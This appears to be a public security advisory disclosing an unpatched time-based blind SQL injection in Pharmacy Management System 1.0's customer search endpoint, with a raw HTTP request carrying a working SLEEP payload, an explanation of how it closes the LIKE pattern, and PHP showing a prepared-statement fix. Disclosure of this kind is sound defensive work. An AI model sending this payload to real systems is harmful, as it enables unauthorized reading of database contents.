
@higordiego
Created October 14, 2024 13:37
Gist: higordiego/b57040961b993cb5f1bfe0005f6b57be

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/manage_customer.php?action=search&text=a

Vulnerability Description:

A critical SQL injection vulnerability was identified in Pharmacy Management System version 1.0. The text parameter of a GET request to /php/manage_customer.php?action=search is placed into a database query without sanitisation or parameter binding, so anyone who controls that parameter can inject arbitrary SQL. The PoC below is a time-based blind payload: it is shaped to close a LIKE '%...%' pattern built around the search term and appends a subquery that calls SLEEP(5), so a delay of about five seconds in the response confirms the injection even though no query output is reflected to the client.

Exploiting this vulnerability can expose sensitive data held in the database (with the time-based blind technique, one condition at a time) and disrupt system operations. Note that the PoC request carries a PHPSESSID cookie and a Referer of manage_customer.php, so the endpoint may require an authenticated session; confirm whether it is reachable without one before treating the issue as pre-authentication, but a flaw reachable by any logged-in user is still critical. Since no patch is currently available, this flaw remains critical and demands immediate attention.


Proof of Concept (PoC):

Below is a GET request that demonstrates the SQL injection by altering the text parameter. URL-decoded, the parameter reads: a%' AND (SELECT 9276 FROM (SELECT(SLEEP(5)))rrau) AND 'gdwz%'='gdwz. The leading a%' terminates the LIKE pattern, the subquery forces a 5-second SLEEP, and the trailing AND 'gdwz%'='gdwz is re-balanced by the %' the application appends after the term. Compare the response time against the same request with SLEEP(0): a consistent delay of roughly five seconds confirms the injection.

GET /php/manage_customer.php?action=search&text=a%25'%20AND%20(SELECT%209276%20FROM%20(SELECT(SLEEP(5)))rrau)%20AND%20'gdwz%25'%3d'gdwz HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_customer.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f;
Connection: keep-alive
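As an added illustration (this is not the Pharmacy Management System's own code), the PHP below shows the assumed vulnerable concatenation that the PoC payload is shaped for, what the query becomes once the payload is URL-decoded and spliced in, and a hardened replacement that binds the search term with a mysqli prepared statement and escapes LIKE wildcards. The table and column names (customers, id, name, phone), the query shape and the connection details are assumptions made for the example.

```php
<?php
// Added example for this advisory; it is not the Pharmacy Management System's
// own code. The table and column names (customers, id, name, phone) and the
// shape of the vulnerable query are assumptions used for illustration.

// Assumed vulnerable pattern: the search term is concatenated straight into a
// LIKE pattern, so a single quote inside $text escapes the string literal.
function vulnerable_search_sql(string $text): string
{
    return "SELECT id, name, phone FROM customers WHERE name LIKE '%" . $text . "%'";
}

// The PoC payload exactly as it appears in the advisory's GET request.
$poc = "a%25'%20AND%20(SELECT%209276%20FROM%20(SELECT(SLEEP(5)))rrau)%20AND%20'gdwz%25'%3d'gdwz";

// After URL decoding and concatenation the query becomes:
//   SELECT id, name, phone FROM customers WHERE name LIKE '%a%'
//     AND (SELECT 9276 FROM (SELECT(SLEEP(5)))rrau) AND 'gdwz%'='gdwz%'
// The leading a%' closes the pattern, the subquery sleeps for 5 seconds, and
// the trailing 'gdwz%'='gdwz is re-balanced by the %' the application appends,
// which is why the payload ends without a closing quote.
echo vulnerable_search_sql(urldecode($poc)), PHP_EOL;

// Hardened handler: the term is bound as a parameter, so it can never alter the
// query's structure, and the LIKE metacharacters % and _ typed by the user are
// escaped with an explicit escape character so they match literally.
function search_customers(mysqli $db, string $text): array
{
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $text);
    $term    = '%' . $escaped . '%';

    $stmt = $db->prepare(
        "SELECT id, name, phone FROM customers WHERE name LIKE ? ESCAPE '!'"
    );
    $stmt->bind_param('s', $term);
    $stmt->execute();

    // get_result() requires the mysqlnd driver, the default in current PHP builds.
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Usage (assumed connection details; the real handler would read $_GET['text']):
// $db = new mysqli('localhost', 'pharmacy', 'secret', 'pharmacy');
// var_dump(search_customers($db, urldecode($poc)));
// With the term bound, the payload is matched as literal text: no SLEEP runs,
// the response returns immediately, and no rows come back unless a customer
// name literally contains the payload string.
```

Running the first part against nothing but PHP itself prints the spliced query and makes the quote-balancing visible; the hardened function is the pattern to apply to every query in manage_customer.php that takes request input, not only the search action.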

Burp Suite Requests:

  • Burp Suite PoC 1

SQLMap Exploit:

  • SQLMap PoC
